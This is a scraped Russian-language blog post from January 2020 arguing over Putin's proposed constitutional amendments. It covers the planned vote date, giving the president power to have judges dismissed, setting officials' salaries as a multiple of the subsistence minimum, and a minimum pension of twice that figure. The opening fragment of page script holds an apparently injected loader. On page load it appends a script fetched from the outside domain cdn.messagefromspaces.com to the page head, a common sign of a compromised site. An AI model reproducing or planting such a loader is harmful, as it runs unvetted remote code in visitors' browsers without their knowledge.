, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Не насмешить бы

20 Янв

Дату голосования по поправкам в Конституцию уже определили, но поправок ещё никто не видел

СМИ сообщают https://www.gazeta.ru/politics/news/2020/01/20/n_13935794.shtml?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews  о том, что в Кремле выбрали дату голосования по поправкам в Конституцию. Предварительная дата — воскресенье, 12 апреля.

Но за прошедшие пять дней никто даже не обозначил, как собираются исполнять предложения Путина по поправкам в Конституцию.

Путин в своём Послании подчеркнул http://kremlin.ru/events/president/news/62582, что необходимо провести голосование граждан страны по всему пакету предложенных поправок в Конституции Российской Федерации. И только по его результатам принимать окончательное решение.

Получается, что россияне вправе лишь проголосовать по всему пакету предложенных поправок в Конституции Российской Федерации, не внося никаких своих предложений по поправкам?

Если Путин считает, что мнение людей, наших граждан, народа как носителя суверенитета и главного источника власти должно быть определяющим, то россияне вправе не только проголосовать, но предложить свои поправки и услышать по ним суждения.

Но россияне пассивны. Сужу по комментариям к моему посту https://echo.msk.ru/blog/advokatvladimir/2572981-echo/  : «А, что россияне могут предложить по изменению Конституции?»

Сообщается, что «Яблоко» разработает    https://www.kommersant.ru/doc/4225291  альтернативный комплекс поправок к Конституции РФ и вынесет его на рассмотрение общественности в ближайшее время.

Григорий Явлинский заявляет, что нам важно, чтобы кроме непримиримых врагов идей и ценностей первых глав Конституции (а также фигуристов и артистов), прозвучали бы и другие голоса.

Целью работы является защитить не только букву, но и дух Конституции, закрепить ценности ее первых глав в структуре государственного устройства так, чтобы гарантировать и сделать незыблемыми разделение властей, независимое и справедливое правосудие…

Рассуждения о «независимом и справедливом» правосудии ещё раз меня убеждают в том, что бесполезной окажется работа  группы из представителей партии, независимых юристов, правоведов, политологов, экспертов и политиков.

Уже даже Путин осознал, что существующая система судопроизводства не способна осуществлять правосудие, как  вид государственной деятельности, осуществляемой с соблюдением особого порядка, закреплённого Конституцией и процессуальным законодательством.

Судьи, игнорирующие требования Конституции и порядок судопроизводства, выносящие неправосудные судебные решения никакой ответственности за это не несут. Некоторые из них, облачаясь в мантии,  вершат  самовластие.

Сегодня Путин, формирующий состав исполнителей судебной власти, никаких полномочий повлиять на это самовластие судебной власти, не может.

Именно поэтому Путин и предложил: «предусмотреть в Конституции полномочия Совета Федерации по представлению Президента России отрешать от должности судей Конституционного и Верховного Судов в случае совершения ими проступков, порочащих честь и достоинство, а также в иных случаях, предусмотренных федеральным конституционным законом, свидетельствующих о невозможности сохранения лицом статуса судьи. Это предложение делается исходя из сложившейся практики. Этого явно сегодня не хватает».

В этом случаи все обращения россиян к главе государства по поводу вынесения неправосудных судебных решений будут рассмотрены и судьи, не подчиняющиеся только Конституции и федеральному законодательству, будут лишаться статуса «судья».

Но для этого надо в Конституции чётко прописать, что по представлению Президента России отрешают от должности не только судей Конституционного и Верховного Судов, но и судей других федеральных судов.

Конкретизации требуют и предложения Путина по минимальному размеру оплаты труда в России, который  не может быть ниже размера прожиточного минимума трудоспособного населения.

Получается, что именно этот показатель характеризует экономическое развитие России. Но тогда и зарплата депутатов, министров и иных чиновников должна быть зависима от того, какой прожиточный минимум в стране.

Но народ убеждают в том, что депутатам надо ещё больше увеличить зарплату, что тогда больше компетентных людей, профессионалов, заинтересуются в том, чтобы работать на Госдуму, что с достойной зарплатой никакие взятки не заинтересуют народного избранника.

А зачем нам такой «народный избранник», если ему важна его зарплата?

Иначе, как дикостью нельзя признать тот факт, что Министр финансов Силуанов в месяц получает около 2 млн. рублей.

Это в два раза https://www.top-personal.ru/issue.html?3546  больше, чем получают министры в США, где средняя зарплата на уровне  240 тыс. руб.

Зная о том, что миллионы работающих россиян за свой труд получают в 160 раз меньшую зарплату, Силуанов считает, что это очень даже справедливая для него зарплата.

Депутат Андрей Макаров призывает к здравому смыслу и указывает на то, что средняя зарплата по стране для депутата Госдумы — это неприемлемое условие.

Давайте учтём опыт экономически развитых стран Европы и США. Там сенаторы, министры и иные чиновники получают зарплату в 2−6 раз, превышающую среднюю зарплату по стране.

Поскольку мы живём в стране с неразвитой экономикой, где прожиточный минимум определяется в 12130 руб., то зарплату, получающую из казны депутатов, министров и иных чиновников, было бы справедливо Конституционно закрепить, как превышающую в 10−15 раз размер прожиточного минимума трудоспособного населения.

Осуществляющие государственную власть сразу озаботятся повышением размера прожиточного минимума, да и разрыв в оплате труда станет более справедливым, чем он искусственно создан сейчас.

И ещё одно уточнение в  предложении Путина: «Закрепить в Основном законе принципы достойного пенсионного обеспечения».

Сегодня пенсионное обеспечение, как форма материального (денежного) обеспечения граждан со стороны государства, является удручающей.

Даже работающим пенсионерам, выплачивающим все налоги и пенсионные взносы, пенсии не индексируют, игнорируя предписания Конституции и федеральные законы.

Миллионы пенсионеров получают пенсии в 8−10 тысяч рублей, что ниже прожиточного минимума.

Для страны с Крымом, Арктикой, Калининградом и Курилами. Обеспечивающей газом, нефтью, древесиной, морепродуктами и металлом десятки стран, иначе, как позором такие пенсия назвать нельзя.

Достойным минимальным пенсионным обеспечением может являть сумма, равная двум размерам  прожиточного минимума трудоспособного населения.

Именно это и надо закрепить в Конституции России.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.